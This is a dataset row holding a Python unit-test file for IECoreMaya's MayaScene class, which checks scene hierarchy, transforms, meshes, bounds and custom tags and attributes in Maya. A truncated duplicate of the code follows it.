code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import maya.cmds
import maya.OpenMaya as OpenMaya
import IECore
import IECoreMaya
class MayaSceneTest( IECoreMaya.TestCase ) :
def setUp( self ) :
maya.cmds.file( new=True, f=True )
def testFileName( self ) :
scene = IECoreMaya.MayaScene()
self.assertRaises( RuntimeError, scene.fileName )
def testChildNames( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( set( child.childNames() ), set( [ "pSphere2", "pSphere3" ] ) )
self.assertEqual( scene.child( "pSphere1" ).child( "pSphere2" ).childNames(), [] )
def testHasChild( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( scene.hasChild("pSphere1"), True )
self.assertEqual( child.hasChild("pSphere1Shape"), False )
self.assertEqual( child.hasChild("pSphere2"), True )
self.assertEqual( child.hasChild("pSphere3"), True )
self.assertEqual( child.hasChild("pSphere3Shape"), False )
self.assertEqual( child.hasChild("pSphere2Shape"), False )
self.assertEqual( child.hasChild("asdfasdf"), False )
def testNames( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
sphere1 = scene.child( "pSphere1" )
sphere2 = sphere1.child( "pSphere2" )
sphere3 = sphere1.child( "pSphere3" )
self.assertEqual( str( scene.name() ), "/" )
self.assertEqual( str( sphere1.name() ), "pSphere1" )
self.assertEqual( str( sphere2.name() ), "pSphere2" )
self.assertEqual( str( sphere3.name() ), "pSphere3" )
def testPaths( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
sphere1 = scene.child( "pSphere1" )
sphere2 = sphere1.child( "pSphere2" )
sphere3 = sphere1.child( "pSphere3" )
self.assertEqual( scene.path(), [] )
self.assertEqual( sphere1.path(), [ "pSphere1" ] )
self.assertEqual( sphere2.path(), [ "pSphere1", "pSphere2" ] )
self.assertEqual( sphere3.path(), [ "pSphere1", "pSphere3" ] )
def testSceneMethod( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
self.assertEqual( str( scene.scene( ["pSphere1"] ).name() ), "pSphere1" )
# does it still return absolute paths if we've gone to another location?
scene = scene.scene( ["pSphere1"] )
self.assertEqual( str( scene.scene( [] ).name() ), "/" )
self.assertEqual( str( scene.scene( ["pSphere1", "pSphere2"] ).name() ), "pSphere2" )
self.assertEqual( str( scene.scene( ["pSphere1", "pSphere3"] ).name() ), "pSphere3" )
self.assertEqual( scene.scene( ["idontexist"], IECore.SceneInterface.MissingBehaviour.NullIfMissing ), None )
self.assertRaises( RuntimeError, IECore.curry( scene.scene, ["idontexist"] ) )
def testHasObject( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( scene.hasObject(), False )
self.assertEqual( child.hasObject(), True )
def testReadTransformMethods( self ) :
# create a little hierarchy
transfromythingy = maya.cmds.createNode( "transform", name="transform1" )
maya.cmds.setAttr( "transform1.tx", 0.1 )
maya.cmds.setAttr( "transform1.ty", 0.2 )
maya.cmds.setAttr( "transform1.tz", 0.3 )
maya.cmds.setAttr( "transform1.rx", 0.1 )
maya.cmds.setAttr( "transform1.ry", 0.2 )
maya.cmds.setAttr( "transform1.rz", 0.3 )
maya.cmds.setAttr( "transform1.sx", 0.1 )
maya.cmds.setAttr( "transform1.sy", 0.2 )
maya.cmds.setAttr( "transform1.sz", 0.3 )
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.parent( "pSphere1", "transform1" )
maya.cmds.setAttr( "pSphere1.tx", 1 )
maya.cmds.setAttr( "pSphere1.ty", 2 )
maya.cmds.setAttr( "pSphere1.tz", 3 )
maya.cmds.setAttr( "pSphere1.rx", 10 )
maya.cmds.setAttr( "pSphere1.ry", 20 )
maya.cmds.setAttr( "pSphere1.rz", 30 )
maya.cmds.setAttr( "pSphere1.sx", 4 )
maya.cmds.setAttr( "pSphere1.sy", 5 )
maya.cmds.setAttr( "pSphere1.sz", 6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "transform1" ).child( "pSphere1" )
# test it returns the correct transform in local space
maya.cmds.currentTime( "0.0sec" )
transform = transformChild.readTransform( 0 ).value
import math
self.assertAlmostEqual( transform.translate.x, 1, 5 )
self.assertAlmostEqual( transform.translate.y, 2, 5 )
self.assertAlmostEqual( transform.translate.z, 3, 5 )
self.assertAlmostEqual( transform.rotate.x * 180.0 / math.pi, 10.0, 5 )
self.assertAlmostEqual( transform.rotate.y * 180.0 / math.pi, 20.0, 5 )
self.assertAlmostEqual( transform.rotate.z * 180.0 / math.pi, 30.0, 5 )
self.assertAlmostEqual( transform.scale.x, 4, 5 )
self.assertAlmostEqual( transform.scale.y, 5, 5 )
self.assertAlmostEqual( transform.scale.z, 6, 5 )
self.assertEqual( transform.transform, transformChild.readTransformAsMatrix( 0 ) )
def testTimeException( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="0sec", v=1 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="0sec", v=2 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="0sec", v=3 )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="1sec", v=4 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="1sec", v=5 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="1sec", v=6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pSphere1" )
# move to frame -1:
maya.cmds.currentTime( -1 )
# test it returns the correct transform in local space
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 0.5 ) )
self.assertRaises( RuntimeError, IECore.curry( transformChild.readTransform, 1.0 ) )
def testAnimatedTransform( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="0sec", v=1 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="0sec", v=2 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="0sec", v=3 )
maya.cmds.setKeyframe( "pSphere1", attribute="tx", t="1sec", v=4 )
maya.cmds.setKeyframe( "pSphere1", attribute="ty", t="1sec", v=5 )
maya.cmds.setKeyframe( "pSphere1", attribute="tz", t="1sec", v=6 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pSphere1" )
# test it returns the correct transform in local space
maya.cmds.currentTime( "0sec" )
transform0 = transformChild.readTransform( 0 ).value
maya.cmds.currentTime( "0.5sec" )
transform0_5 = transformChild.readTransform( 0.5 ).value
maya.cmds.currentTime( "1sec" )
transform1 = transformChild.readTransform( 1 ).value
self.assertEqual( transform0.translate, IECore.V3d( 1, 2, 3 ) )
self.assertAlmostEqual( transform0_5.translate.x, 2.5, 5 )
self.assertAlmostEqual( transform0_5.translate.y, 3.5, 5 )
self.assertAlmostEqual( transform0_5.translate.z, 4.5, 5 )
self.assertEqual( transform1.translate, IECore.V3d( 4, 5, 6 ) )
def testDeletedDagPath( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
maya.cmds.delete( "pSphere1" )
self.assertRaises( RuntimeError, IECore.curry( child.child, "pSphereShape1" ) )
self.assertRaises( RuntimeError, child.childNames )
self.assertRaises( RuntimeError, IECore.curry( child.hasChild, "asdd" ) )
self.assertRaises( RuntimeError, child.name )
self.assertRaises( RuntimeError, child.path )
self.assertRaises( RuntimeError, child.hasObject )
self.assertRaises( RuntimeError, IECore.curry( child.readBound, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readObject, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readTransform, 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( child.readTransformAsMatrix, 0.0 ) )
# this doesn't need to throw an exception does it?
self.assertEqual( child.scene( [ "pSphere1", "pSphereShape1" ], IECore.SceneInterface.MissingBehaviour.NullIfMissing ), None )
# I guess this does...
self.assertRaises( RuntimeError, IECore.curry( child.scene, [ "pSphere1", "pSphereShape1" ] ) )
def testReadMesh( self ) :
# create a cube:
maya.cmds.polyCube( name = "pCube1" )
# transform a bit, so we can check it's returning the mesh in world space:
maya.cmds.setAttr( "pCube1.tx", 0.1 )
maya.cmds.setAttr( "pCube1.ty", 0.2 )
maya.cmds.setAttr( "pCube1.tz", 0.3 )
maya.cmds.setAttr( "pCube1.rx", 10 )
maya.cmds.setAttr( "pCube1.ry", 20 )
maya.cmds.setAttr( "pCube1.rz", 30 )
scene = IECoreMaya.MayaScene()
cube = scene.child( "pCube1" )
# read mesh at time 0:
maya.cmds.currentTime( "0.0sec" )
mesh = cube.readObject( 0 )
vertList = list( mesh["P"].data )
# check it's got the right length:
self.assertEqual( len( vertList ), 8 )
# check it's got the right verts:
self.assertEqual( vertList.count( IECore.V3f( -0.5, -0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, -0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, 0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, 0.5, 0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, 0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, 0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( -0.5, -0.5, -0.5 ) ), 1 )
self.assertEqual( vertList.count( IECore.V3f( 0.5, -0.5, -0.5 ) ), 1 )
# check read primvars
self.assertEqual( mesh["P"], cube.readObjectPrimitiveVariables( [ "P" ], 0 )["P"] )
def testAnimatedMesh( self ) :
cube = maya.cmds.polyCube( name = "pCube1" )
# create a skin cluster to animate vertex 0:
maya.cmds.select( cl=True )
maya.cmds.select( "pCube1.vtx[0]", r=True )
cluster = maya.mel.eval( 'newCluster "-envelope 1"' )[1]
maya.cmds.setKeyframe( cluster, attribute="tx", t="0sec" )
maya.cmds.setKeyframe( cluster, attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
cube = scene.child( "pCube1" )
# read mesh at different times:
maya.cmds.currentTime( "0.0sec" )
mesh0 = cube.readObject( 0 )
maya.cmds.currentTime( "0.5sec" )
mesh0_5 = cube.readObject( 0.5 )
maya.cmds.currentTime( "1.0sec" )
mesh1 = cube.readObject( 1 )
# have we moved vertex 0?
self.assertEqual( mesh0["P"].data[0].x, -0.5 )
self.assertEqual( mesh0_5["P"].data[0].x, -1 )
self.assertEqual( mesh1["P"].data[0].x, -1.5 )
def testReadBound( self ) :
# create some cubes:
maya.cmds.polyCube( name = "pCube1" )
maya.cmds.polyCube( name = "pCube2" )
maya.cmds.polyCube( name = "pCube3" )
maya.cmds.polyCube( name = "pCube4" )
maya.cmds.parent( "pCube2", "pCube1" )
maya.cmds.parent( "pCube3", "pCube1" )
maya.cmds.setAttr( "pCube4.tx", 3 )
maya.cmds.setAttr( "pCube4.ty", 3 )
maya.cmds.setAttr( "pCube4.tz", 3 )
maya.cmds.setAttr( "pCube2.tx", 1 )
maya.cmds.setAttr( "pCube2.ty", 1 )
maya.cmds.setAttr( "pCube2.tz", 1 )
maya.cmds.setAttr( "pCube3.tx", -1 )
maya.cmds.setAttr( "pCube3.ty", -1 )
maya.cmds.setAttr( "pCube3.tz", -1 )
scene = IECoreMaya.MayaScene()
cube4Transform = scene.child( "pCube4" )
cube1Transform = scene.child( "pCube1" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( scene.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 3.5, 3.5, 3.5 ) ) )
self.assertEqual( cube4Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
# check it's including its children:
self.assertEqual( cube1Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 1.5, 1.5, 1.5 ) ) )
maya.cmds.setAttr( "pCube1.tx", 1 )
maya.cmds.setAttr( "pCube1.ty", 1 )
maya.cmds.setAttr( "pCube1.tz", 1 )
# should be in object space!!!
self.assertEqual( cube1Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -1.5, -1.5, -1.5 ), IECore.V3d( 1.5, 1.5, 1.5 ) ) )
cube2Transform = cube1Transform.child( "pCube2" )
self.assertEqual( cube2Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
cube3Transform = cube1Transform.child( "pCube3" )
self.assertEqual( cube3Transform.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
def testAnimatedMeshBound( self ) :
# Currently fails, because I'm pulling on the boundingBox plugs at arbitrary
# times, and that doesn't work, although it kind of should!
maya.cmds.polyCube( name = "pCube2" )
# create a skin cluster to animate vertex 0:
maya.cmds.select( cl=True )
maya.cmds.select( "pCube2.vtx[0]", r=True )
cluster = maya.mel.eval( 'newCluster "-envelope 1"' )[1]
maya.cmds.setKeyframe( cluster, attribute="tx", t="0sec" )
maya.cmds.setKeyframe( cluster, attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pCube2" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( transformChild.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "0.5sec" )
self.assertEqual( transformChild.readBound( 0.5 ), IECore.Box3d( IECore.V3d( -1.0, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "1.0sec" )
self.assertEqual( transformChild.readBound( 1.0 ), IECore.Box3d( IECore.V3d( -1.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
def testAnimatedBound( self ) :
# Currently fails, because I'm pulling on the boundingBox plugs at arbitrary
# times, and that doesn't work, although it kind of should!
maya.cmds.polyCube( name = "pCube1" )
maya.cmds.createNode( "transform", name = "pCube1Parent" )
maya.cmds.parent( "pCube1", "pCube1Parent" )
maya.cmds.setKeyframe( "pCube1", attribute="tx", t="0sec", v=0 )
maya.cmds.setKeyframe( "pCube1", attribute="tx", t="1sec", v=-1 )
scene = IECoreMaya.MayaScene()
transformChild = scene.child( "pCube1Parent" )
maya.cmds.currentTime( "0.0sec" )
self.assertEqual( transformChild.readBound( 0.0 ), IECore.Box3d( IECore.V3d( -0.5, -0.5, -0.5 ), IECore.V3d( 0.5, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "0.5sec" )
self.assertEqual( transformChild.readBound( 0.5 ), IECore.Box3d( IECore.V3d( -1.0, -0.5, -0.5 ), IECore.V3d( 0.0, 0.5, 0.5 ) ) )
maya.cmds.currentTime( "1.0sec" )
self.assertEqual( transformChild.readBound( 1.0 ), IECore.Box3d( IECore.V3d( -1.5, -0.5, -0.5 ), IECore.V3d( -0.5, 0.5, 0.5 ) ) )
def testCameraTransform( self ) :
# camera must be output with an identity transform, because of the hierarchical
# nature of this class...
scene = IECoreMaya.MayaScene()
cameraTransform = scene.child( "persp" )
maya.cmds.currentTime( "0.0sec" )
camera = cameraTransform.readObject( 0 )
# sanity check: camera transform is not identity?
self.assertNotEqual( cameraTransform.readTransformAsMatrix( 0 ), IECore.M44f() )
# this transform must be identity...
self.assertEqual( camera.getTransform().transform(), IECore.M44f() )
def testMeshChange( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
sphere = scene.child( "pSphere1" )
maya.cmds.currentTime( "0.0sec" )
mesh = sphere.readObject( 0 )
# should default to 382 verts:
self.assertEqual( len( mesh["P"].data ), 382 )
maya.cmds.setAttr( "polySphere1.subdivisionsAxis", 3 )
maya.cmds.setAttr( "polySphere1.subdivisionsHeight", 3 )
mesh = sphere.readObject( 0 )
# should be 8 verts now:
self.assertEqual( len( mesh["P"].data ), 8 )
def testWriteExceptions( self ) :
scene = IECoreMaya.MayaScene()
self.assertRaises( RuntimeError, IECore.curry( scene.writeBound, IECore.Box3d(), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeTransform, IECore.M44dData( IECore.M44d() ), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeAttribute, "asdfs", IECore.BoolData( False ), 0.0 ) )
self.assertRaises( RuntimeError, IECore.curry( scene.writeObject, IECore.SpherePrimitive(), 0.0 ) )
def testSceneShapeCustomReaders( self ):
# make sure we are at time 0
maya.cmds.currentTime( "0sec" )
scene = IECoreMaya.MayaScene()
envShape = str( IECoreMaya.FnSceneShape.create( "ieScene1" ).fullPathName() )
envNode = 'ieScene1'
envScene = scene.child( envNode )
self.assertFalse( envScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
maya.cmds.setAttr( envShape+'.file', 'test/IECore/data/sccFiles/environment.lscc',type='string' )
self.assertTrue( envScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
spheresShape = str( IECoreMaya.FnSceneShape.create( "ieScene2" ).fullPathName() )
spheresNode = 'ieScene2'
maya.cmds.setAttr( spheresShape+'.file', 'test/IECore/data/sccFiles/animatedSpheres.scc',type='string' )
self.assertEqual( set( scene.childNames() ).intersection([ envNode, spheresNode ]) , set( [ envNode, spheresNode ] ) )
self.assertTrue( IECore.LinkedScene.linkAttribute in envScene.attributeNames() )
self.assertEqual( envScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/environment.lscc'), "root":IECore.InternedStringVectorData() } ) )
self.assertFalse( envScene.hasObject() )
spheresScene = scene.child( spheresNode )
self.assertTrue( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertEqual( spheresScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData() } ) )
self.assertFalse( spheresScene.hasObject() )
# expand the scene
fnSpheres = IECoreMaya.FnSceneShape( spheresShape )
fnSpheres.expandAll()
self.assertFalse( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
leafScene = spheresScene.child("A").child("a")
self.assertTrue( leafScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
# When expanding, we connect the child time attributes to their scene shape parent time attribute to propagate time remapping. When checking for time remapping, the scene shape
# currently only checks the direct connection, so we have here time in the link attributes. Will have to look out for performance issues.
self.assertEqual( leafScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData([ 'A', 'a' ]), 'time':IECore.DoubleData( 0 ) } ) )
self.assertFalse( leafScene.hasObject() )
# expand scene to meshes
fnSpheres.convertAllToGeometry()
self.assertFalse( leafScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertTrue( leafScene.hasObject() )
self.assertTrue( isinstance( leafScene.readObject(0), IECore.MeshPrimitive) )
# test time remapped scene readers...
spheresShape = str( maya.cmds.createNode( 'ieSceneShape' ) )
maya.cmds.setAttr( spheresShape+'.file', 'test/IECore/data/sccFiles/animatedSpheres.scc',type='string' )
maya.cmds.setAttr( spheresShape+'.time', 24.0*10 )
spheresScene = scene.child( 'ieScene3' )
self.assertTrue( spheresScene.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertEqual( spheresScene.readAttribute( IECore.LinkedScene.linkAttribute, 0 ), IECore.CompoundData( { "fileName":IECore.StringData('test/IECore/data/sccFiles/animatedSpheres.scc'), "root":IECore.InternedStringVectorData(), "time":IECore.DoubleData(10.0) } ) )
def testReadRootAttribute( self ):
maya.cmds.file( new=True, f=True )
# make sure we are at time 0
maya.cmds.currentTime( "0sec" )
scene = IECoreMaya.MayaScene()
# tests a bug where calling attributeNames at the root raised an exception
scene.attributeNames()
def testCustomTags( self ) :
t = maya.cmds.createNode( "transform" )
maya.cmds.select( clear = True )
sphere = maya.cmds.polySphere( name="pSphere" )
doTest = True
def hasMyTags( node, tag, tagFilter ) :
"""'archivable' should be on all transforms and 'renderable' only at shape transforms."""
if not doTest:
return False
if tag not in ( "renderable", "archivable" ) :
return False
if tag == "archivable" :
return True
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return False
if not ( tagFilter & IECore.SceneInterface.TagFilter.LocalTag ) :
return False
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return False
return dagPath.fullPathName().endswith("Shape")
def readMyTags( node, tagFilter ) :
"""'archivable' should be on all transforms and 'renderable' only at shape transforms."""
if not doTest:
return []
result = [ "archivable" ]
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return result
if tagFilter & IECore.SceneInterface.TagFilter.LocalTag and dagPath.apiType() == maya.OpenMaya.MFn.kMesh :
result.append( "renderable" )
return result
IECoreMaya.MayaScene.registerCustomTags( hasMyTags, readMyTags )
scene = IECoreMaya.MayaScene()
transformScene = scene.child(str(t))
sphereScene = scene.child('pSphere')
self.assertFalse( scene.hasTag( 'renderable' ) )
self.assertFalse( scene.hasTag( 'archivable' ) )
self.assertEqual( scene.readTags(), [] )
self.assertFalse( transformScene.hasTag( 'renderable' ) )
self.assertTrue( transformScene.hasTag( 'archivable' ) )
self.assertEqual( transformScene.readTags(), [ IECore.InternedString('archivable') ] )
self.assertEqual( set(sphereScene.readTags()), set([ IECore.InternedString('renderable'), IECore.InternedString('archivable') ]) )
self.assertEqual( set(sphereScene.readTags( IECore.SceneInterface.TagFilter.EveryTag )), set([ IECore.InternedString('renderable'), IECore.InternedString('archivable') ]) )
self.assertEqual( sphereScene.readTags( IECore.SceneInterface.TagFilter.AncestorTag ), [ IECore.InternedString('archivable') ] )
self.assertTrue( sphereScene.hasTag( 'renderable') )
self.assertTrue( sphereScene.hasTag( 'archivable') )
# Disable custom tag functions so they don't mess with other tests
doTest = False
def testCustomAttributes( self ) :
t = maya.cmds.createNode( "transform" )
maya.cmds.select( clear = True )
sphere = maya.cmds.polySphere( name="pSphere" )
maya.cmds.currentTime( "0sec" )
doTest = True
def myAttributeNames( node ) :
if not doTest:
return []
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
return ["transformAttribute"]
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return []
return ["shapeAttribute"]
def readMyAttribute( node, attr ) :
if not doTest:
return None
dagPath = IECoreMaya.StringUtil.dagPathFromString(node)
try:
dagPath.extendToShapeDirectlyBelow(0)
except:
if attr == "shapeAttribute":
return None
return IECore.FloatData( 5 )
if attr == "transformAttribute":
return None
if dagPath.apiType() != maya.OpenMaya.MFn.kMesh :
return None
return IECore.StringData("mesh")
IECoreMaya.MayaScene.registerCustomAttributes( myAttributeNames, readMyAttribute )
scene = IECoreMaya.MayaScene()
transformScene = scene.child(str(t))
sphereScene = scene.child('pSphere')
self.assertEqual( scene.attributeNames(), [] )
self.assertEqual( scene.readAttribute("anyAttr", 0.0), None )
self.assertEqual( transformScene.attributeNames(), [ IECore.InternedString("transformAttribute") ] )
self.assertEqual( transformScene.hasAttribute("shapeAttribute"), False )
self.assertEqual( transformScene.readAttribute("shapeAttribute", 0.0), None )
self.assertEqual( transformScene.readAttribute( "transformAttribute", 0.0), IECore.FloatData(5) )
self.assertEqual( sphereScene.attributeNames(), [ IECore.InternedString('shapeAttribute') ] )
self.assertEqual( sphereScene.readAttribute( "shapeAttribute", 0.0), IECore.StringData("mesh") )
# Disable custom attribute functions so they don't mess with other tests
doTest = False
if __name__ == "__main__":
IECoreMaya.TestProgram( plugins = [ "ieCore" ] ) | test/IECoreMaya/MayaSceneTest.py |
import maya.cmds
import maya.OpenMaya as OpenMaya
import IECore
import IECoreMaya
class MayaSceneTest( IECoreMaya.TestCase ) :
def setUp( self ) :
maya.cmds.file( new=True, f=True )
def testFileName( self ) :
scene = IECoreMaya.MayaScene()
self.assertRaises( RuntimeError, scene.fileName )
def testChildNames( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( set( child.childNames() ), set( [ "pSphere2", "pSphere3" ] ) )
self.assertEqual( scene.child( "pSphere1" ).child( "pSphere2" ).childNames(), [] )
def testHasChild( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( scene.hasChild("pSphere1"), True )
self.assertEqual( child.hasChild("pSphere1Shape"), False )
self.assertEqual( child.hasChild("pSphere2"), True )
self.assertEqual( child.hasChild("pSphere3"), True )
self.assertEqual( child.hasChild("pSphere3Shape"), False )
self.assertEqual( child.hasChild("pSphere2Shape"), False )
self.assertEqual( child.hasChild("asdfasdf"), False )
def testNames( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
sphere1 = scene.child( "pSphere1" )
sphere2 = sphere1.child( "pSphere2" )
sphere3 = sphere1.child( "pSphere3" )
self.assertEqual( str( scene.name() ), "/" )
self.assertEqual( str( sphere1.name() ), "pSphere1" )
self.assertEqual( str( sphere2.name() ), "pSphere2" )
self.assertEqual( str( sphere3.name() ), "pSphere3" )
def testPaths( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
sphere1 = scene.child( "pSphere1" )
sphere2 = sphere1.child( "pSphere2" )
sphere3 = sphere1.child( "pSphere3" )
self.assertEqual( scene.path(), [] )
self.assertEqual( sphere1.path(), [ "pSphere1" ] )
self.assertEqual( sphere2.path(), [ "pSphere1", "pSphere2" ] )
self.assertEqual( sphere3.path(), [ "pSphere1", "pSphere3" ] )
def testSceneMethod( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
sphere2 = maya.cmds.polySphere( name="pSphere2" )
sphere3 = maya.cmds.polySphere( name="pSphere3" )
maya.cmds.parent( "pSphere2", "pSphere1" )
maya.cmds.parent( "pSphere3", "pSphere1" )
scene = IECoreMaya.MayaScene()
self.assertEqual( str( scene.scene( ["pSphere1"] ).name() ), "pSphere1" )
# does it still return absolute paths if we've gone to another location?
scene = scene.scene( ["pSphere1"] )
self.assertEqual( str( scene.scene( [] ).name() ), "/" )
self.assertEqual( str( scene.scene( ["pSphere1", "pSphere2"] ).name() ), "pSphere2" )
self.assertEqual( str( scene.scene( ["pSphere1", "pSphere3"] ).name() ), "pSphere3" )
self.assertEqual( scene.scene( ["idontexist"], IECore.SceneInterface.MissingBehaviour.NullIfMissing ), None )
self.assertRaises( RuntimeError, IECore.curry( scene.scene, ["idontexist"] ) )
def testHasObject( self ) :
sphere = maya.cmds.polySphere( name="pSphere1" )
scene = IECoreMaya.MayaScene()
child = scene.child( "pSphere1" )
self.assertEqual( scene.hasObject(), False )
self.assertEqual( child.hasObject(), True )
def testReadTransformMethods( self ) :
# create a little hierarchy
transfromythingy = maya.cmds.createNode( "transform", name="transform1" )
